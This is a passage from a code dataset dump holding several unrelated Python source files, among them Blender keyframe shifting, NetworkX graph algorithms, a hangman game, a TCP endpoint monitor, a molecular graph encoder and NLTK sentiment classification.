factor=1, frameshift=0,\n frame_start=0, frame_end=1000000):\n \"\"\"\n Shift keyframes by given factor or frameshift for given actions\n within given number of frames.\n In details: shift the keyframe_points and their handles.\n Only works properly for fcurves with bezier-shape or poly-curves.\n Fcurve-modifiers are not taken into account.\n\n Keyword arguments:\n actions -- set or list of actions for which frames shall be\n shifted (default: all actions available)\n frame_start, frame_end -- range of frames for which keyframe_points\n are shifted\n factor -- stretch keyframe_points in given range by this factor\n frameshift -- add this number to the keyframe_points in given range\n \"\"\"\n\n # Loop over all actions and their fcurves,\n # multiply keyframe-positions and handles by given factor\n # and then shift by given frameshift\n for action in actions:\n print(\"Action \", action.name)\n\n for fcu in action.fcurves:\n print(\" %s channel %d\" % (fcu.data_path, fcu.array_index))\n\n for keyframe in fcu.keyframe_points:\n\n if (keyframe.co[0] >= frame_start\n and keyframe.co[0] <= frame_end):\n\n #print(\" %s\" % keyframe.co) # coordinates x,y\n\n keyframe.co[0] = keyframe.co[0]*factor + frameshift\n keyframe.handle_left[0] = (keyframe.handle_left[0]*factor\n + frameshift)\n keyframe.handle_right[0] = (keyframe.handle_right[0]*factor\n + frameshift)\n\n return\n\n\nif __name__ == \"__main__\":\n\n # Just stretch everything by factor 3\n #shift_keyframes(factor=3)\n\n # Get actions for specified objects only\n actions = get_actions_for_objects(namepattern='C*')\n #print('Actions: ', actions)\n\n # Stretch only keyframes for these animation actions\n shift_keyframes(actions=actions, factor=2)\n","sub_path":"shift_keyframes.py","file_name":"shift_keyframes.py","file_ext":"py","file_size_in_byte":4608,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"197848859","text":"import metagraph as mg\nfrom metagraph import concrete_algorithm, NodeID\nfrom metagraph.plugins import has_networkx, has_community, has_pandas\nfrom typing import Tuple, Iterable, Any, Callable\n\n\nif has_networkx:\n import networkx as nx\n import numpy as np\n from .types import NetworkXGraph, NetworkXBipartiteGraph\n from ..python.types import PythonNodeMap, PythonNodeSet\n from ..numpy.types import NumpyVector\n\n @concrete_algorithm(\"centrality.pagerank\")\n def nx_pagerank(\n graph: NetworkXGraph, damping: float, maxiter: int, tolerance: float\n ) -> PythonNodeMap:\n pagerank = nx.pagerank(\n graph.value, alpha=damping, max_iter=maxiter, tol=tolerance, weight=None\n )\n return PythonNodeMap(pagerank)\n\n @concrete_algorithm(\"centrality.katz\")\n def nx_katz_centrality(\n graph: NetworkXGraph,\n attenuation_factor: float,\n immediate_neighbor_weight: float,\n maxiter: int,\n tolerance: float,\n ) -> PythonNodeMap:\n katz_centrality_scores = nx.katz_centrality(\n graph.value,\n alpha=attenuation_factor,\n beta=immediate_neighbor_weight,\n max_iter=maxiter,\n tol=tolerance,\n weight=graph.edge_weight_label,\n )\n return PythonNodeMap(katz_centrality_scores)\n\n @concrete_algorithm(\"cluster.triangle_count\")\n def nx_triangle_count(graph: NetworkXGraph) -> int:\n triangles = nx.triangles(graph.value)\n # Sum up triangles from each node\n # Divide by 3 because each triangle is counted 3 times\n total_triangles = sum(triangles.values()) // 3\n return total_triangles\n\n @concrete_algorithm(\"clustering.connected_components\")\n def nx_connected_components(graph: NetworkXGraph) -> PythonNodeMap:\n index_to_label = dict()\n for i, nodes in enumerate(nx.connected_components(graph.value)):\n for node in nodes:\n index_to_label[node] = i\n return PythonNodeMap(index_to_label,)\n\n @concrete_algorithm(\"clustering.strongly_connected_components\")\n def nx_strongly_connected_components(graph: NetworkXGraph) -> PythonNodeMap:\n index_to_label = dict()\n for i, nodes in enumerate(nx.strongly_connected_components(graph.value)):\n for node in nodes:\n index_to_label[node] = i\n return PythonNodeMap(index_to_label,)\n\n @concrete_algorithm(\"clustering.label_propagation_community\")\n def nx_label_propagation_community(graph: NetworkXGraph) -> PythonNodeMap:\n communities = nx.algorithms.community.label_propagation.label_propagation_communities(\n graph.value\n )\n index_to_label = dict()\n for label, nodes in enumerate(communities):\n for node in nodes:\n index_to_label[node] = label\n return PythonNodeMap(index_to_label,)\n\n @concrete_algorithm(\"subgraph.extract_subgraph\")\n def nx_extract_subgraph(\n graph: NetworkXGraph, nodes: PythonNodeSet\n ) -> NetworkXGraph:\n subgraph = graph.value.subgraph(nodes.value)\n return NetworkXGraph(subgraph, edge_weight_label=graph.edge_weight_label)\n\n @concrete_algorithm(\"subgraph.k_core\")\n def nx_k_core(graph: NetworkXGraph, k: int) -> NetworkXGraph:\n k_core_graph = nx.k_core(graph.value, k)\n return NetworkXGraph(k_core_graph, edge_weight_label=graph.edge_weight_label)\n\n @concrete_algorithm(\"traversal.bellman_ford\")\n def nx_bellman_ford(\n graph: NetworkXGraph, source_node: NodeID\n ) -> Tuple[PythonNodeMap, PythonNodeMap]:\n predecessors_map, distance_map = nx.bellman_ford_predecessor_and_distance(\n graph.value, source_node\n )\n single_parent_map = {\n child: parents[0] if len(parents) > 0 else source_node\n for child, parents in predecessors_map.items()\n }\n return (\n PythonNodeMap(single_parent_map,),\n PythonNodeMap(distance_map,),\n )\n\n @concrete_algorithm(\"traversal.dijkstra\")\n def nx_dijkstra(\n graph: NetworkXGraph, source_node: NodeID # , max_path_length: float\n ) -> Tuple[PythonNodeMap, PythonNodeMap]:\n predecessors_map, distance_map = nx.dijkstra_predecessor_and_distance(\n graph.value, source_node, # cutoff=max_path_length,\n )\n single_parent_map = {\n child: parents[0] if len(parents) > 0 else source_node\n for child, parents in predecessors_map.items()\n }\n return (\n PythonNodeMap(single_parent_map,),\n PythonNodeMap(distance_map,),\n )\n\n @concrete_algorithm(\"centrality.betweenness\")\n def nx_betweenness_centrality(\n graph: NetworkXGraph,\n nodes: mg.Optional[PythonNodeSet],\n normalize: bool,\n # include_endpoints: bool,\n ) -> PythonNodeMap:\n if nodes is None:\n sources = targets = graph.value.nodes\n else:\n sources = targets = nodes.value\n node_to_score_map = nx.betweenness_centrality_subset(\n graph.value,\n sources=sources,\n targets=targets,\n normalized=normalize,\n weight=graph.edge_weight_label,\n # endpoints=include_endpoints,\n )\n return PythonNodeMap(node_to_score_map,)\n\n @concrete_algorithm(\"traversal.bfs_iter\")\n def nx_breadth_first_search(\n graph: NetworkXGraph, source_node: NodeID, depth_limit: int\n ) -> NumpyVector:\n bfs_ordered_node_array = np.array(\n nx.breadth_first_search.bfs_tree(graph.value, source_node)\n )\n return NumpyVector(bfs_ordered_node_array)\n\n @concrete_algorithm(\"bipartite.graph_projection\")\n def nx_graph_projection(\n bgraph: NetworkXBipartiteGraph, nodes_retained: int\n ) -> NetworkXGraph:\n g_proj = nx.projected_graph(bgraph.value, bgraph.nodes[nodes_retained])\n return NetworkXGraph(\n g_proj,\n node_weight_label=bgraph.node_weight_label,\n edge_weight_label=bgraph.edge_weight_label,\n )\n\n @concrete_algorithm(\"util.graph.aggregate_edges\")\n def nx_graph_aggregate_edges(\n graph: NetworkXGraph,\n func: Callable[[Any, Any], Any],\n initial_value: Any,\n in_edges: bool,\n out_edges: bool,\n ) -> PythonNodeMap:\n result_dict = {node: initial_value for node in graph.value.nodes}\n if in_edges or out_edges:\n if in_edges != out_edges:\n is_directed = NetworkXGraph.Type.compute_abstract_properties(\n graph, {\"is_directed\"}\n )[\"is_directed\"]\n if not is_directed:\n in_edges = out_edges = True\n for start_node, end_node, weight in graph.value.edges.data(\n graph.edge_weight_label\n ):\n if out_edges:\n result_dict[start_node] = func(weight, result_dict[start_node])\n if in_edges:\n result_dict[end_node] = func(weight, result_dict[end_node])\n return PythonNodeMap(result_dict)\n\n @concrete_algorithm(\"util.graph.filter_edges\")\n def nx_graph_filter_edges(\n graph: NetworkXGraph, func: Callable[[Any], bool]\n ) -> NetworkXGraph:\n result_nx_graph = type(graph.value)()\n result_nx_graph.add_nodes_from(graph.value.nodes.data())\n ebunch = filter(\n lambda uvw_triple: func(uvw_triple[-1]),\n graph.value.edges.data(data=graph.edge_weight_label),\n )\n result_nx_graph.add_weighted_edges_from(ebunch, weight=graph.edge_weight_label)\n return NetworkXGraph(\n result_nx_graph,\n node_weight_label=graph.node_weight_label,\n edge_weight_label=graph.edge_weight_label,\n )\n\n @concrete_algorithm(\"util.graph.assign_uniform_weight\")\n def nx_graph_assign_uniform_weight(\n graph: NetworkXGraph, weight: Any\n ) -> NetworkXGraph:\n result_nx_graph = graph.value.copy()\n for _, _, edge_attributes in result_nx_graph.edges.data():\n edge_attributes[graph.edge_weight_label] = weight\n return NetworkXGraph(\n result_nx_graph, graph.node_weight_label, graph.edge_weight_label\n )\n\n\nif has_networkx and has_community:\n import community as community_louvain\n from .types import NetworkXGraph\n from ..python.types import PythonNodeMap\n\n @concrete_algorithm(\"clustering.louvain_community\")\n def nx_louvain_community(graph: NetworkXGraph) -> Tuple[PythonNodeMap, float]:\n index_to_label = community_louvain.best_partition(graph.value)\n modularity_score = community_louvain.modularity(index_to_label, graph.value)\n return (\n PythonNodeMap(index_to_label,),\n modularity_score,\n )\n\n\nif has_networkx and has_pandas:\n from ..pandas.types import PandasEdgeSet, PandasEdgeMap\n from ..python.types import PythonNodeMap, PythonNodeSet\n\n @concrete_algorithm(\"util.graph.build\")\n def nx_graph_build_from_pandas(\n edges: mg.Union[PandasEdgeSet, PandasEdgeMap],\n nodes: mg.Optional[mg.Union[PythonNodeSet, PythonNodeMap]],\n ) -> NetworkXGraph:\n g = nx.DiGraph() if edges.is_directed else nx.Graph()\n if nodes is not None:\n if type(nodes) is PythonNodeMap:\n g.add_nodes_from((n, {\"weight\": v}) for n, v in nodes.value.items())\n else:\n g.add_nodes_from(nodes.value)\n if type(edges) is PandasEdgeMap:\n df = edges.value[[edges.src_label, edges.dst_label, edges.weight_label]]\n g.add_weighted_edges_from(df.itertuples(index=False, name=\"WeightedEdge\"))\n else:\n df = edges.value[[edges.src_label, edges.dst_label]]\n g.add_edges_from(df.itertuples(index=False, name=\"Edge\"))\n return NetworkXGraph(g)\n","sub_path":"metagraph/plugins/networkx/algorithms.py","file_name":"algorithms.py","file_ext":"py","file_size_in_byte":9926,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"177515860","text":"import numpy as np\r\nimport matplotlib.pyplot as plt\r\n\r\nx0 = 5 #[fm]\r\na = 1 #[fm]\r\nk = 1.38 #[fm]^(-1)\r\n\r\nA = (1./(2*np.pi*a**2))**(1./4)\r\n\r\ndef psi(x):\r\n abs_square = A**2*np.exp(-(x-x0)**2/(2.*a**2))\r\n return abs_square\r\n\r\nn = 100\r\nx = np.linspace(0,2*x0,n)\r\n\r\nplt.plot(x,psi(x))\r\nplt.xlabel('x [fm]'); plt.ylabel('$|\\\\Psi(x,0)|^2$')\r\nplt.title('Probability density')\r\nplt.show()\r\n\r\nhbar = 6.582e-16\r\nprint (k*1e15)**2*hbar**2/(2*3.727e9/(3e8)**2)\r\n","sub_path":"2a.py","file_name":"2a.py","file_ext":"py","file_size_in_byte":482,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"585411150","text":"import random\n\n# library that we use in order to choose\n\nname = input(\"What is your name? \")\n# Here the user is asked to enter the name first\nprint(\"Good Luck ! \", name)\n\nwords = []\nn = int(input(\"How many words do you want to work with? \"))\n# iterating till the range\nfor i in range(0, n):\n print(\"Enter word No-{}: \".format(i+1))\n elm = str(input())\n words.append(elm) # adding the element\n\n# Function will choose one random\n# word from this list of words\nword = random.choice(words)\n\nprint(\"Guess the characters of one the words you choose\")\n\nguesses = ''\nturns = int(n - 1)\n\nwhile turns > 0:\n\n # counts the number of times a user fails\n failed = 0\n\n # all characters from the input\n # word taking one at a time.\n for char in word:\n\n # comparing that character with\n # the character in guesses\n if char in guesses:\n print(char)\n\n else:\n print(\"\")\n\n # for every failure 1 will be\n # incremented in failure\n failed += 1\n\n if failed == 0:\n # user will win the game if failure is 0\n # and 'You Win' will be given as output\n print(\"You Win\")\n\n # this print the correct word\n print(\"The word is: \", word)\n break\n\n # if user has input the wrong alphabet then\n # it will ask user to enter another alphabet\n guess = input(\"guess a character:\")\n\n # every input character will be stored in guesses\n guesses += guess\n\n # check input with the character in word\n if guess not in word:\n\n turns -= 1\n\n # if the character doesn’t match the word\n # then “Wrong” will be given as output\n print(\"Wrong\")\n\n # this will print the number of\n # turns left for the user\n print(\"You have\", + turns, 'more guesses')\n\n if turns == 0:\n print(\"You Loose\")\n\n\n\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1878,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"23032573","text":"import socket\nfrom collections import namedtuple\nfrom .mylog import log\n\nEndpointInfo = namedtuple(\"EndpointInfo\", field_names=[\"host\", \"port\", \"timeout\"])\n\ndef print_endpoint(endpoint):\n return \"{0:s}:{1:d}\".format(endpoint.host, endpoint.port)\n\nTCPInfo = namedtuple(\"TCPInfo\", field_names=[\"endpoint\", \"success\", \"message\"])\n\ndef monitor(endpoint):\n log.debug(\"Creating a TCP connection for monitoring the endpoint %s\",\n print_endpoint(endpoint))\n try:\n sock = socket.create_connection((endpoint.host, endpoint.port), endpoint.timeout)\n log.info(\"Successfully connected to the endpoint %s\",\n print_endpoint(endpoint))\n return TCPInfo(endpoint=endpoint,\n success=True,\n message=\"{0:s} is listening\".format(print_endpoint(endpoint)))\n except Exception as e:\n log.warning(\"Could not connect to the endpoint %s: %s\",\n print_endpoint(endpoint),\n str(e))\n return TCPInfo(endpoint=endpoint,\n success=False,\n message=\"{0:s} {1:s}\".format(print_endpoint(endpoint), str(e)))\n finally:\n try:\n log.debug(\"Closing the TCP connection\")\n sock.close()\n except:\n pass\n\n","sub_path":"src/checker/tcpmonitor.py","file_name":"tcpmonitor.py","file_ext":"py","file_size_in_byte":1306,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"33065616","text":"#!/usr/bin/env python3\nimport sys\nimport os\n\n__license__ = \"MIT\"\n__copyright__ = \"Northern.tech\"\n\ndef user_error(msg):\n print(\"Error: {}\".format(msg))\n sys.exit(1)\n\n\nfunctions = {\"strcmp\": [\"int\", \"char *\", \"char *\"],\n \"strncmp\": [\"int\", \"char *\", \"char *\", \"size_t\"]}\n\ntemplate = r\"\"\"\n#include \n#include \n\nint main(void)\n{open}\n {return_type} r = {func}({args});\n printf(\"{func}({args_escaped}) -> {return_fmt}\\n\", r);\n return 0;\n{close}\n\"\"\"\n\n\ndef format_value(c_type, value):\n if c_type in [\"int\", \"size_t\"]:\n return \"%d\", str(value)\n elif c_type == \"char *\":\n return \"%s\", '\"' + str(value) + '\"'\n elif c_type == \"char\":\n return \"%c\", \"'\" + str(value) + \"'\"\n raise AssertionError\n\n\ndef fmt(c_type):\n f, v = format_value(c_type, 1)\n return f\n\n\ndef c_source_gen(func, args):\n if func not in functions:\n user_error(\"Unrecognized function - {}\".format(func))\n prototype = functions[func]\n if len(prototype) != len(args) + 1:\n user_error(\"Incorrect number of function arguments\")\n\n return_type = prototype[0]\n return_fmt = fmt(return_type)\n c_types = prototype[1:]\n values = []\n formats = []\n for arg, c_type in zip(args, c_types):\n f, v = format_value(c_type, arg)\n values.append(v)\n formats.append(f)\n args = \", \".join(values)\n source = template\n source = source.format(\n return_type=return_type,\n func=func,\n args=args,\n args_escaped=args.replace('\"', r'\\\"'),\n return_fmt=return_fmt,\n open=\"{\",\n close=\"}\")\n # print(source)\n return source\n\n\ndef c_generate_compile_run(func, args):\n source = c_source_gen(func, args)\n with open(\"tmp.c\", \"w\") as f:\n f.write(source)\n os.system(\"gcc tmp.c -o tmp && ./tmp\")\n\n\ndef main():\n argv = sys.argv\n func = None\n args = None\n if not argv[0].endswith(\"/c\"):\n func = argv[0].split(\"/\")[-1]\n args = argv[1:]\n elif len(argv) > 1:\n func = argv[1]\n args = argv[2:]\n else:\n user_error(\"Too few arguments\")\n\n # print(\"{}({})\".format(func, \", \".join(args)))\n return c_generate_compile_run(func, args)\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"c.py","file_name":"c.py","file_ext":"py","file_size_in_byte":2254,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"451769803","text":"\"\"\"\nConfiguration\n基础设置\n\"\"\"\nimport os\n\nDEBUG = False\n# 文件根目录\nBASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\n\n# 资源目录\nRESOURCES_DIR = os.path.join(BASE_DIR, 'resources')\nIMG_DIRS = [\n os.path.join(RESOURCES_DIR, 'img'),\n]\nFONT_DIRS = [\n os.path.join(RESOURCES_DIR, 'fonts'),\n]\nDEFAULT_FONT = 'hallo-sans.otf'\n","sub_path":"Final_work/Game/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":362,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"505171141","text":"def func_print_star(in_num=0):\n if in_num >= 1 and in_num <= 100:\n variable = [\"*\"*x for x in range(1, in_num+1)]\n for value in variable:\n print(value)\n else:\n print(\"in_num 범위가 아닙니다.\")\n\ndef func_main():\n a = int(input())\n func_print_star(a)\n\nif __name__ == '__main__':\n func_main()\n","sub_path":"Step/3_problem_11/step_3_9_2438.py","file_name":"step_3_9_2438.py","file_ext":"py","file_size_in_byte":344,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"293876198","text":"import torch\nimport torch.nn as nn\nimport rdkit.Chem as Chem\nimport torch.nn.functional as F\nfrom .nnutils import *\nfrom .mol_graph import MolGraph\nfrom .rnn import GRU, LSTM\n\nimport numpy as np\n\nclass MPNEncoder(nn.Module):\n\n def __init__(self, rnn_type, input_size, node_fdim, hidden_size, depth, dropout):\n super(MPNEncoder, self).__init__()\n self.hidden_size = hidden_size\n self.input_size = input_size\n self.depth = depth\n self.W_o = nn.Sequential( \n nn.Linear(node_fdim + hidden_size, hidden_size), \n nn.ReLU(),\n nn.Dropout(dropout)\n )\n\n if rnn_type == 'GRU':\n self.rnn = GRU(input_size, hidden_size, depth) \n elif rnn_type == 'LSTM':\n self.rnn = LSTM(input_size, hidden_size, depth) \n else:\n raise ValueError('unsupported rnn cell type ' + rnn_type)\n\n def forward(self, fnode, fmess, agraph, bgraph):\n h = self.rnn(fmess, bgraph)\n h = self.rnn.get_hidden_state(h)\n nei_message = index_select_ND(h, 0, agraph)\n nei_message = nei_message.sum(dim=1)\n node_hiddens = torch.cat([fnode, nei_message], dim=1)\n node_hiddens = self.W_o(node_hiddens)\n\n mask = torch.ones(node_hiddens.size(0), 1, device=fnode.device)\n mask[0, 0] = 0 #first node is padding\n return node_hiddens * mask, h #return only the hidden state (different from IncMPNEncoder in LSTM case)\n\nclass HierMPNEncoder(nn.Module):\n\n def __init__(self, vocab, avocab, rnn_type, embed_size, hidden_size, depthT, depthG, dropout):\n super(HierMPNEncoder, self).__init__()\n self.vocab = vocab\n self.hidden_size = hidden_size\n self.dropout = dropout\n self.atom_size = atom_size = avocab.size()\n self.bond_size = bond_size = len(MolGraph.BOND_LIST) + MolGraph.MAX_POS\n\n self.E_c = nn.Sequential(\n nn.Embedding(vocab.size()[0], embed_size),\n nn.Dropout(dropout)\n )\n self.E_i = nn.Sequential(\n nn.Embedding(vocab.size()[1], embed_size),\n nn.Dropout(dropout)\n )\n self.W_c = nn.Sequential( \n nn.Linear(embed_size + hidden_size, hidden_size), \n nn.ReLU(),\n nn.Dropout(dropout)\n )\n self.W_i = nn.Sequential( \n nn.Linear(embed_size + hidden_size, hidden_size), \n nn.ReLU(),\n nn.Dropout(dropout)\n )\n\n self.E_a = torch.eye(atom_size).cuda()\n self.E_b = torch.eye( len(MolGraph.BOND_LIST) ).cuda()\n self.E_apos = torch.eye( MolGraph.MAX_POS ).cuda()\n self.E_pos = torch.eye( MolGraph.MAX_POS ).cuda()\n\n self.W_root = nn.Sequential( \n nn.Linear(hidden_size * 2, hidden_size), \n nn.Tanh() #root activation is tanh\n )\n self.tree_encoder = MPNEncoder(rnn_type, hidden_size + MolGraph.MAX_POS, hidden_size, hidden_size, depthT, dropout)\n self.inter_encoder = MPNEncoder(rnn_type, hidden_size + MolGraph.MAX_POS, hidden_size, hidden_size, depthT, dropout)\n self.graph_encoder = MPNEncoder(rnn_type, atom_size + bond_size, atom_size, hidden_size, depthG, dropout)\n\n def tie_embedding(self, other):\n self.E_c, self.E_i = other.E_c, other.E_i\n self.E_a, self.E_b = other.E_a, other.E_b\n \n def embed_inter(self, tree_tensors, hatom):\n fnode, fmess, agraph, bgraph, cgraph, _ = tree_tensors\n finput = self.E_i(fnode[:, 1])\n\n hnode = index_select_ND(hatom, 0, cgraph).sum(dim=1)\n hnode = self.W_i( torch.cat([finput, hnode], dim=-1) )\n\n hmess = hnode.index_select(index=fmess[:, 0], dim=0)\n pos_vecs = self.E_pos.index_select(0, fmess[:, 2])\n hmess = torch.cat( [hmess, pos_vecs], dim=-1 ) \n return hnode, hmess, agraph, bgraph\n\n def embed_tree(self, tree_tensors, hinter):\n fnode, fmess, agraph, bgraph, cgraph, _ = tree_tensors\n finput = self.E_c(fnode[:, 0])\n hnode = self.W_c( torch.cat([finput, hinter], dim=-1) )\n\n hmess = hnode.index_select(index=fmess[:, 0], dim=0)\n pos_vecs = self.E_pos.index_select(0, fmess[:, 2])\n hmess = torch.cat( [hmess, pos_vecs], dim=-1 ) \n return hnode, hmess, agraph, bgraph\n \n def embed_graph(self, graph_tensors):\n fnode, fmess, agraph, bgraph, _ = graph_tensors\n hnode = self.E_a.index_select(index=fnode, dim=0)\n fmess1 = hnode.index_select(index=fmess[:, 0], dim=0)\n fmess2 = self.E_b.index_select(index=fmess[:, 2], dim=0)\n fpos = self.E_apos.index_select(index=fmess[:, 3], dim=0)\n hmess = torch.cat([fmess1, fmess2, fpos], dim=-1)\n return hnode, hmess, agraph, bgraph\n\n def embed_root(self, hmess, tree_tensors, roots):\n roots = tree_tensors[2].new_tensor(roots) \n fnode = tree_tensors[0].index_select(0, roots)\n agraph = tree_tensors[2].index_select(0, roots)\n\n nei_message = index_select_ND(hmess, 0, agraph)\n nei_message = nei_message.sum(dim=1)\n node_hiddens = torch.cat([fnode, nei_message], dim=1)\n return self.W_root(node_hiddens)\n\n def forward(self, tree_tensors, graph_tensors):\n# print('graph shape:',np.shape(graph_tensors[0]),np.shape(graph_tensors[1]),np.shape(graph_tensors[2]),np.shape(graph_tensors[3]),np.shape(graph_tensors[4]))\n tensors = self.embed_graph(graph_tensors)\n hatom,_ = self.graph_encoder(*tensors)\n\n tensors = self.embed_inter(tree_tensors, hatom)\n hinter,_ = self.inter_encoder(*tensors)\n\n tensors = self.embed_tree(tree_tensors, hinter)\n hnode,hmess = self.tree_encoder(*tensors)\n hroot = self.embed_root(hmess, tensors, [st for st,le in tree_tensors[-1]])\n\n return hroot, hnode, hinter, hatom\n\nclass IncMPNEncoder(MPNEncoder):\n\n def __init__(self, rnn_type, input_size, node_fdim, hidden_size, depth, dropout):\n super(IncMPNEncoder, self).__init__(rnn_type, input_size, node_fdim, hidden_size, depth, dropout)\n\n def forward(self, tensors, h, num_nodes, subset):\n fnode, fmess, agraph, bgraph = tensors\n subnode, submess = subset\n\n if len(submess) > 0: \n h = self.rnn.sparse_forward(h, fmess, submess, bgraph)\n\n nei_message = index_select_ND(self.rnn.get_hidden_state(h), 0, agraph)\n nei_message = nei_message.sum(dim=1)\n node_hiddens = torch.cat([fnode, nei_message], dim=1)\n node_hiddens = self.W_o(node_hiddens)\n\n node_buf = torch.zeros(num_nodes, self.hidden_size, device=fmess.device)\n node_hiddens = index_scatter(node_hiddens, node_buf, subnode)\n return node_hiddens, h\n\nclass IncHierMPNEncoder(HierMPNEncoder):\n\n def __init__(self, vocab, avocab, rnn_type, embed_size, hidden_size, depthT, depthG, dropout):\n super(IncHierMPNEncoder, self).__init__(vocab, avocab, rnn_type, embed_size, hidden_size, depthT, depthG, dropout)\n self.tree_encoder = IncMPNEncoder(rnn_type, hidden_size + MolGraph.MAX_POS, hidden_size, hidden_size, depthT, dropout)\n self.inter_encoder = IncMPNEncoder(rnn_type, hidden_size + MolGraph.MAX_POS, hidden_size, hidden_size, depthT, dropout)\n self.graph_encoder = IncMPNEncoder(rnn_type, self.atom_size + self.bond_size, self.atom_size, hidden_size, depthG, dropout)\n del self.W_root\n\n def get_sub_tensor(self, tensors, subset):\n subnode, submess = subset\n fnode, fmess, agraph, bgraph = tensors[:4]\n fnode, fmess = fnode.index_select(0, subnode), fmess.index_select(0, submess)\n agraph, bgraph = agraph.index_select(0, subnode), bgraph.index_select(0, submess)\n\n if len(tensors) == 6:\n cgraph = tensors[4].index_select(0, subnode)\n return fnode, fmess, agraph, bgraph, cgraph, tensors[-1]\n else:\n return fnode, fmess, agraph, bgraph, tensors[-1]\n\n def embed_sub_tree(self, tree_tensors, hinput, subtree, is_inter_layer):\n subnode, submess = subtree\n num_nodes = tree_tensors[0].size(0)\n fnode, fmess, agraph, bgraph, cgraph, _ = self.get_sub_tensor(tree_tensors, subtree)\n\n if is_inter_layer:\n finput = self.E_i(fnode[:, 1])\n hinput = index_select_ND(hinput, 0, cgraph).sum(dim=1)\n hnode = self.W_i( torch.cat([finput, hinput], dim=-1) )\n else:\n finput = self.E_c(fnode[:, 0])\n hinput = hinput.index_select(0, subnode)\n hnode = self.W_c( torch.cat([finput, hinput], dim=-1) )\n\n if len(submess) == 0:\n hmess = fmess\n else:\n node_buf = torch.zeros(num_nodes, self.hidden_size, device=fmess.device)\n node_buf = index_scatter(hnode, node_buf, subnode)\n hmess = node_buf.index_select(index=fmess[:, 0], dim=0)\n pos_vecs = self.E_pos.index_select(0, fmess[:, 2])\n hmess = torch.cat( [hmess, pos_vecs], dim=-1 ) \n return hnode, hmess, agraph, bgraph \n\n def forward(self, tree_tensors, inter_tensors, graph_tensors, htree, hinter, hgraph, subtree, subgraph):\n num_tree_nodes = tree_tensors[0].size(0)\n num_graph_nodes = graph_tensors[0].size(0)\n\n if len(subgraph[0]) + len(subgraph[1]) > 0:\n sub_graph_tensors = self.get_sub_tensor(graph_tensors, subgraph)[:-1] #graph tensor is already embedded\n hgraph.node, hgraph.mess = self.graph_encoder(sub_graph_tensors, hgraph.mess, num_graph_nodes, subgraph)\n\n if len(subtree[0]) + len(subtree[1]) > 0:\n sub_inter_tensors = self.embed_sub_tree(inter_tensors, hgraph.node, subtree, is_inter_layer=True)\n hinter.node, hinter.mess = self.inter_encoder(sub_inter_tensors, hinter.mess, num_tree_nodes, subtree)\n\n sub_tree_tensors = self.embed_sub_tree(tree_tensors, hinter.node, subtree, is_inter_layer=False)\n htree.node, htree.mess = self.tree_encoder(sub_tree_tensors, htree.mess, num_tree_nodes, subtree)\n\n return htree, hinter, hgraph\n\n","sub_path":"g2g_optimization/hgraph/.ipynb_checkpoints/encoder-checkpoint.py","file_name":"encoder-checkpoint.py","file_ext":"py","file_size_in_byte":10078,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"248172471","text":"from nltk.corpus import stopwords\nfrom nltk import pos_tag\nfrom nltk.stem import WordNetLemmatizer\nimport string\nfrom nltk.corpus import movie_reviews\nimport random\nfrom nltk.corpus import wordnet\nimport nltk\n\n\ndef loading():\n # print(movie_reviews.categories())\n # print(movie_reviews.fileids())\n documents=[]\n for i in movie_reviews.categories():\n for j in movie_reviews.fileids():\n documents.append((movie_reviews.words(j),i))\n # print(documents[0:5])\n random.shuffle(documents)\n return documents\n\n\ndef pos_to_wordnet(pos_tag):\n # print(pos_tag)\n if pos_tag.startswith('J'):\n return wordnet.ADJ\n elif pos_tag.startswith('N'):\n return wordnet.NOUN\n elif pos_tag.startswith('V'):\n return wordnet.VERB\n elif pos_tag.startswith('R'):\n return wordnet.ADJ\n else:\n return wordnet.NOUN\n\n\ndef cleaning_words(words):\n word_array=[]\n lemmatizer = WordNetLemmatizer()\n stop_words = stopwords.words('english')\n punctuations = list(string.punctuation)\n stop_words += punctuations\n for i in range(len(words)):\n if words[i] in stop_words:\n continue\n else:\n pos_tuple_returned=pos_tag([words[i]])\n word=lemmatizer.lemmatize(words[i],pos=pos_to_wordnet(pos_tuple_returned[0][1]))\n word_array.append(word)\n return word_array\n\n\ndef cleaning_file(document):\n cleaned_words=[]\n for i in range(len(document)):\n new_array=cleaning_words(document[i][0])\n print(new_array)\n cleaned_words.append((new_array,document[i][1]))\n return cleaned_words\n\ndef finding_features(document):\n feature_words=[]\n for i in range(len(document)):\n feature_words.append(document[i][0])\n freq= nltk.FreqDist(feature_words)\n top_words_tuple=freq.most_common(3000)\n top_words=[i[0] for i in top_words_tuple]\n print(top_words)\n return top_words\n\n\ndef creating_dictionary_single_file(top_words,words):\n dict={}\n for i in range(len(words)):\n if words[i] in top_words:\n dict+={ words[i] : True }\n else:\n continue\n return dict\n\ndef creating_dictionary(top_words,document):\n feature_set=[]\n for i in range(len(document)):\n dict=creating_dictionary_single_file(top_words,document[i][0])\n feature_set.append((dict,document[i][1]))\n\n return feature_set\n\nfrom sklearn.svm import SVC\nfrom nltk.classify.scikitlearn import SklearnClassifier\nfrom sklearn.ensemble import RandomForestClassifier\n\n\ndocument=loading()\nprint(document)\ncleaned_words=cleaning_file(document)\nx_y_train, x_y_test=cleaned_words[0:1500],cleaned_words[1500:]\ntop_words=finding_features(x_y_train)\nfeature_set=creating_dictionary(top_words,x_y_train)\ntest_set=creating_dictionary(top_words,x_y_test)\nfrom nltk import 